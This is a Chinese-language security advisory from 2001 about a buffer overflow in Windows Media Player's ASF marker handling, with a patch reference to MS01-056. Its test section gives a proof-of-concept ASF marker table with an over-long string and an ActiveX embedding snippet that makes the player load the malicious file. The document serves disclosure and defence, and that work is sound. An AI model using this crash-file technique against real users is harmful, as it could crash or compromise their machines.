发布日期：2001-08-07
更新日期：2001-11-21

受影响系统：

Microsoft Windows Media Player 6.4
Microsoft Windows Media Player 7
Microsoft Windows Media Player 7.1
   - Microsoft Windows NT
   - Microsoft Windows 2000
Windows Media Player for Windows XP
   - Microsoft Windows XP

描述：

---

微软的媒体播放器在处理.ASF文件中的标记时没有进行有效的边界检查，如果攻击者设置
一个超长的标记，就有可能触发缓冲区溢出。攻击者可以通过发送邮件或者在网页上提供
恶意.ASF文件的方式来诱使受害者打开恶意文件，当受害者点击弹出来的菜单条时，媒体
播放器可能崩溃或者执行攻击者设定的任意代码。

<*来源：Pauli Ojanpera (pauli_ojanpera@hotmail.com) *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Pauli Ojanpera (pauli_ojanpera@hotmail.com)提供了下列测试方法：

使用ASFCHOP.EXE程序在一个ASF文件中嵌入下列脚本语句：
ASF file:

----8<----cut-here-----8<----
start_marker_table
0.0
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC
0.1 Click here to bypass the advertisements!
end_marker_table
----8<----cut-here-----8<----

当用户点击菜单条时，媒体播放器将崩溃。

对于媒体播放器7,需要使用ActiveX控件来使其执行有问题的WMP模块：
<OBJECT classid=CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95 id=DSPlay1
name=DSPlay1
type="application/x-oleobject">
    <PARAM NAME="ShowControls" VALUE="-1">
    <PARAM NAME="ShowGotoBar" VALUE="1">
    <PARAM NAME="ShowStatusBar" VALUE="1">
        <PARAM NAME="ControlType" VALUE="2">
        <PARAM NAME="Filename" VALUE="a.asf">
        <PARAM NAME="InvokeURLs" VALUE="-1">
</OBJECT>

建议：

---

临时解决方法：


不要点击ASF文件中的菜单条。

厂商补丁：

微软已经为此发布了一个安全公告（MS01-056）以及相应补丁程序：
http://www.microsoft.com/technet/security/bulletin/MS01-056.asp

补丁下载地址：

      Windows Media Player 6.4、7或7.1：
      http://download.microsoft.com/download/winmediaplayer/Update/308567/WIN98MeXP/EN-US/wm308567.exe
      Windows Media Player for Windows XP:
      http://windowsupdate.com

浏览次数：4182
严重程度：0（网友投票）